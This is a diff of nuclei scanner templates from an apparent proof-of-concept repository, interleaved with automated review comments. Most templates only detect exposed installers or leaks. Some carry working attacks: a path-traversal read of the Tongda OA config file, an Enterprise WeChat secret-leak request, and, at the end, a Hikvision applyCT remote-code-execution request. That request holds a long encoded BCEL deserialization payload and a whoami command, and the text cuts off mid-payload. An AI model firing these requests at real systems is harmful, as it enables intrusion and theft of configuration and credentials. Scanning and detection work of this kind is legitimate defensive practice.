@@ -0,0 +1,32 @@ +id: spa-cart-installer + +info: + name: SPA Cart - Installer + author: pussycat0x + severity: high + description: SPA Cart installer was found. + reference: + - https://spa-cart.com/ + metadata: + max-request: 1 + fofa-query: title="SPA Cart Installation" + tags: spa-cart,exposure,installer,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + words: + - "<title>SPA Cart Installation" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100c09a075668a57e2d44045c4514e35e620d873c092058b30c3a1e02328aa2406802201c2d079dca0ab6762bee18dc881e0c9a434ada56ebf406148800a2639d1a6c46:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/sugarcrm-install.yaml b/poc/other/sugarcrm-install.yaml index a2c22376a5..d5841e1212 100644 --- a/poc/other/sugarcrm-install.yaml +++ b/poc/other/sugarcrm-install.yaml @@ -4,6 +4,7 @@ info: name: SugarCRM Exposed Installation author: ritikchaddha severity: high + description: SugarCRM is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -25,5 +26,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200e82aa9e4f0d4c2f5c8f36f3710b33967e2cb36e26967c9a793a20521c32c9e9022026181a8cf98e08cfea6c1f9662f4550eb99b75294b536b05d7e7491b6e0590b2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/tautulli-install.yaml b/poc/other/tautulli-install.yaml index 33a54a95bf..72331e446a 100644 --- a/poc/other/tautulli-install.yaml +++ b/poc/other/tautulli-install.yaml 
@@ -4,6 +4,7 @@ info: name: Tautulli - Exposed Installation author: ritikchaddha severity: high + description: Tautulli is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -26,5 +27,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022003e945b43ba5589fe6afe1630beafd30a7e5c6e9cbbd7d05329110b7dca63195022100f367fe96b977d613dd829ed31a000d7a00b1e6443f2555efc0bcebe498065bd4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/tongda-video-file-read.yaml b/poc/other/tongda-video-file-read.yaml new file mode 100755 index 0000000000..a25dbec320 --- /dev/null +++ b/poc/other/tongda-video-file-read.yaml @@ -0,0 +1,33 @@ +id: tongda-video-file-read + +info: + name: Tongda OA V2017 Video File - Arbitrary File Read + author: SleepingBag945 + severity: medium + description: | + There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability. + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="1967132225" + tags: tongda,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "$ROOT_PATH" + - "$ATTACH_PATH" + + - type: status + status: + - 200 + +# digest: 490a0046304402203d491497c57e0e70a7266b53e860b9ed5af0df0ac64ec101644c39221cc2004702205268afb077d307842fefa4b8ac93cf269be3bdb7011060114dfdde10d52d3035:922c64590222798bb761d5b6d8e72950 
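Review bot: In `tongda-video-file-read` the description calls the product "Extreme OA" while the name, path and tags all say Tongda OA, and the two-word matcher has no `condition`, so nuclei's default `or` lets either `$ROOT_PATH` or `$ATTACH_PATH` alone satisfy it. Add `condition: and` to the word matcher and change the description to name `Tongda OA`. Operator caveat worth a sentence in the description: the probe fetches the live `inc/oa_config.php`, so a positive result places the target's configuration (likely including database settings) in scanner output and those results must be handled as secrets.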
diff --git a/poc/other/untangle-admin-setup.yaml b/poc/other/untangle-admin-setup.yaml index d5bc3bf07f..1ea0c52d38 100644 --- a/poc/other/untangle-admin-setup.yaml +++ b/poc/other/untangle-admin-setup.yaml @@ -4,6 +4,7 @@ info: name: Untangle Exposed Admin Signup author: ritikchaddha severity: medium + description: Untangle Exposed Admin Signup is exposed publicly. metadata: verified: true max-request: 1 @@ -28,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206d051dd5350c45cabe20dcc3a29e0c3b3bfcbe3018bd85d7e3ca3d2e22b83f53022100888c309964c9101cf88e77b4b6119572e08e0337fc0278f051f6f81b1f19bb82:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/wechat-info-leak.yaml b/poc/other/wechat-info-leak.yaml new file mode 100644 index 0000000000..89ecb10f3f --- /dev/null +++ b/poc/other/wechat-info-leak.yaml 
@@ -0,0 +1,31 @@ +id: wechat-info-leak + +info: + name: WeChat agentinfo - Information Exposure + author: SleepingBag945 + severity: high + description: | + There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: body="wework_admin.normal_layout" + tags: wechat,exposure,tencent + +http: + - raw: + - | + GET /cgi-bin/gateway/agentinfo HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid") + - contains(body_1,"corpid") + condition: and + +# digest: 490a0046304402207f486e40109265aad0c4dbad59a5f8796ffbe6ce2d5707c954f4fe749f5f20fa0220570d64485600b1b15c5fd02eadd4efe5a190588c346ac31ee8f25047e7b55b7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/yonyou-nc-baseapp-deserialization.yaml b/poc/other/yonyou-nc-baseapp-deserialization.yaml new file mode 100755 index 0000000000..9c9651a8bb --- /dev/null +++ b/poc/other/yonyou-nc-baseapp-deserialization.yaml 
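Review bot: The second DSL clause `contains(body_1,"corpid")` is implied by the first clause's `contains(body_1,"strcorpid")`, so the `condition: and` adds nothing; drop the redundant line or replace it with a check on the field that actually carries the leaked secret, which the description promises but the matcher never looks for. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET is unnecessary and can be removed. Because a hit exposes a credential, consider a regex extractor for the secret field so the finding is actionable without re-requesting, and state in the description that scanner output will contain a secret.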
@@ -0,0 +1,28 @@ +id: yonyou-nc-baseapp-deserialization + +info: + name: Yonyou NC BaseApp UploadServlet - Deserialization Detect + author: SleepingBag945 + severity: high + description: | + Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands. + reference: + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json + metadata: + verified: true + max-request: 1 + fofa-query: app="Yonyou-UFIDA-NC" + tags: yonyou,nc,fileupload,baseapp,deserialization,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/service/~baseapp/UploadServlet" + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains_all(body_1,"java.io","EOFExceptionYI")' + condition: and + +# digest: 4a0a0047304502206bf0c638958001afad3ac481fa22472c2f2a4f1a14a75ea3d81d5e14a018b923022100cccf2c9cacc806de75ec4b150aaea3aa365c3d9eb9e8dec19bab6684d16c5e19:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/yonyou-nc-info-leak.yaml b/poc/other/yonyou-nc-info-leak.yaml new file mode 100644 index 0000000000..357b6d2081 --- /dev/null +++ b/poc/other/yonyou-nc-info-leak.yaml 
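Review bot: The description describes arbitrary file upload and command execution at length, but the request is a bare GET with no body and the matcher only looks for a `java.io` / `EOFExceptionYI` deserialization error, so a hit shows that `UploadServlet` is reachable and attempts to deserialize unauthenticated input — not that upload or RCE works. Trim the description to what is verified, e.g. `Detects an unauthenticated UploadServlet that deserializes request data (EOFException on an empty GET); upload and command execution are not exercised.` The `intrusive` tag looks misapplied for a payload-less GET, and `condition: and` under a single DSL entry is a no-op that can be removed.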
@@ -0,0 +1,35 @@ +id: yonyou-nc-info-leak + +info: + name: Yonyou UFIDA NC - Information Exposure + author: SleepingBag945 + severity: medium + description: | + After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly. + reference: + - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ + - https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py + metadata: + verified: true + max-request: 1 + fofa-query: app="用友-UFIDA-NC + tags: yonyou,nc,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease" + + matchers-condition: and + matchers: + - type: word + words: + - "iufo/web/images/usericon.gif" + - "/iufo/web/images/tree/tree_plus.gif" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/zencart-installer.yaml b/poc/other/zencart-installer.yaml index 57d88dd291..dfc9451882 100644 --- a/poc/other/zencart-installer.yaml +++ b/poc/other/zencart-installer.yaml @@ -4,6 +4,7 @@ info: name: Zen Cart Installer author: DhiyaneshDk severity: high + description: Zen Cart is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.zen-cart.com/ metadata: 
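Review bot: `fofa-query: app="用友-UFIDA-NC` in the yonyou-nc-info-leak metadata is missing its closing double quote, so the query as written is malformed; it should read `fofa-query: app="用友-UFIDA-NC"`. The description also contradicts the template: it talks about gaining upload permission after logging in, while the request is a single unauthenticated GET whose matcher only checks for two image paths and a 200 status, so the description should describe what is actually detected. The zencart hunk that follows on this line is a description-only change and needs nothing.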
@@ -28,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202cbf616bc15702cfbd73fe87e0fc0d463e1621b609e29a8768be48c70ef44cb402206ec29a7a10375d7697bcead710d1397a913d486ef27b8c08d1196802c35f9b67:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/php/custom-css-js-php.yaml b/poc/php/custom-css-js-php.yaml new file mode 100644 index 0000000000..efbbeaf2e4 --- /dev/null +++ b/poc/php/custom-css-js-php.yaml @@ -0,0 +1,59 @@ +id: custom-css-js-php + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file 
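Review bot: The `description`, `cvss-metrics`, `cvss-score` and `cve-id` fields in the custom-css-js-php hunk are empty, yet `tags` still carries `cve`; either fill in the identifier and scoring from the referenced Wordfence advisory or drop the `cve` tag so consumers filtering on it do not receive a template with no CVE. `shodan-query: 'vuln:'` is likewise an empty placeholder and should be removed. The file also ends without the `# digest:` line every other template on this page carries and without a trailing newline, so the signing step appears to have been skipped for it. The zencart hunk preceding it is a digest-only change.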
diff --git a/poc/php/phpgedview-installer.yaml b/poc/php/phpgedview-installer.yaml new file mode 100644 index 0000000000..868bacb8c6 --- /dev/null +++ b/poc/php/phpgedview-installer.yaml @@ -0,0 +1,32 @@ +id: phpgedview-installer + +info: + name: PhpGedView Installer Exposure + author: ritikchaddha + severity: high + description: PhpGedView is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"/phpgedview.db" + tags: misconfig,phpgedview,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/install.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Installation Wizard' + - 'phpgedview' + condition: and + case-insensitive: true + + - type: status + status: + - 200 +# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/php/phplist-detect.yaml b/poc/php/phplist-detect.yaml new file mode 100644 index 0000000000..abeee78371 --- /dev/null +++ b/poc/php/phplist-detect.yaml 
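Review bot: The phpgedview-installer hunk has no `reference:` entry, while the neighbouring templates cite a project page or advisory; add one pointing at the PhpGedView project or the upstream template so the `high` severity assigned to an exposed installer can be traced. The word matcher with `condition: and` plus `case-insensitive: true` is otherwise consistent with the zencart-installer template touched above.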
@@ -0,0 +1,42 @@ +id: phplist-detect + +info: + name: phpList - Detect + author: ricardomaia + severity: info + description: | + phpList is an open source newsletter manager. + reference: + - https://www.phplist.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phplist" + tags: tech,phplist,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'content="phpList' + - 'phpList Ltd' + - 'phpList' + condition: or + case-insensitive: true + + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)version.((\d\.?)+)' + +# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950 diff --git a/poc/php/phpsys-info.yaml b/poc/php/phpsys-info.yaml new file mode 100644 index 0000000000..9b2806bd2b --- /dev/null +++ b/poc/php/phpsys-info.yaml @@ -0,0 +1,33 @@ +id: phpsys-info + +info: + name: phpSysInfo Exposure + author: fpatrik + severity: low + description: | + phpSysInfo: a customizable PHP script that displays information about your system nicely + reference: https://phpsysinfo.github.io/phpsysinfo/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phpSysInfo" + tags: config,exposure,phpsysinfo + +http: + - method: GET + path: + - "{{BaseURL}}/phpsysinfo/index.php?disp=bootstrap" + + matchers-condition: and + matchers: + - type: word + words: + - 'phpSysInfo' + - 'Hardware Information' + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022007eae5c482391a502e1165c940ad07ee2b0c4d9d00ef45dbb05bd2c905480dc7022100e054e5cf9b85bd1a6b75e9e2a959d8176c1a04831e8788c670bdc539ed361df5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/php/thinkphp-errors.yaml b/poc/php/thinkphp-errors.yaml index fe1eff3613..bd0a14bc47 100644 
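Review bot: In the phplist-detect hunk the word matcher's third entry `'phpList'` combined with `case-insensitive: true` and `condition: or` subsumes the first two (`content="phpList` and `phpList Ltd`), so the matcher reduces to "body contains phplist" and will also fire on pages that merely mention or link to phpList. Keeping only the two specific strings, or adding `matchers-condition: and` with a status check, would cut false positives. The version extractor regex `(?i)version.((\d\.?)+)` matches any occurrence of "version" followed by a digit, so it may capture an unrelated version string on the page; anchoring it to the generator meta tag would be more reliable, if that is what the template intends to read.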
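Review bot: `reference: https://phpsysinfo.github.io/phpsysinfo/` in the phpsys-info hunk is written as a bare scalar while every other template on this page uses the list form (`reference:` then `- url`); the engine may accept both, but the inconsistency will trip template linters and should be normalised to the list form. The `config` tag also does not match what the template does — it checks a system-information page, not a configuration file — so `config` should be dropped or replaced.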
--- a/poc/php/thinkphp-errors.yaml +++ b/poc/php/thinkphp-errors.yaml @@ -4,6 +4,7 @@ info: name: ThinkPHP Errors - Sensitive Information Exposure author: j4vaovo severity: medium + description: ThinkPHP error is leaking sensitive info. metadata: verified: true max-request: 1 @@ -45,5 +46,4 @@ http: - 500 - 404 condition: or - -# digest: 490a0046304402201ed9eeddb84684c81cad2e9dd5bae4b23de5d31ea95354508dbca365e888a7c302207d05684ef6245fa925fe4d817ba6bddaa3bfbe391f9ea3fac92d0de4f4df3054:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
@@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7
c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$
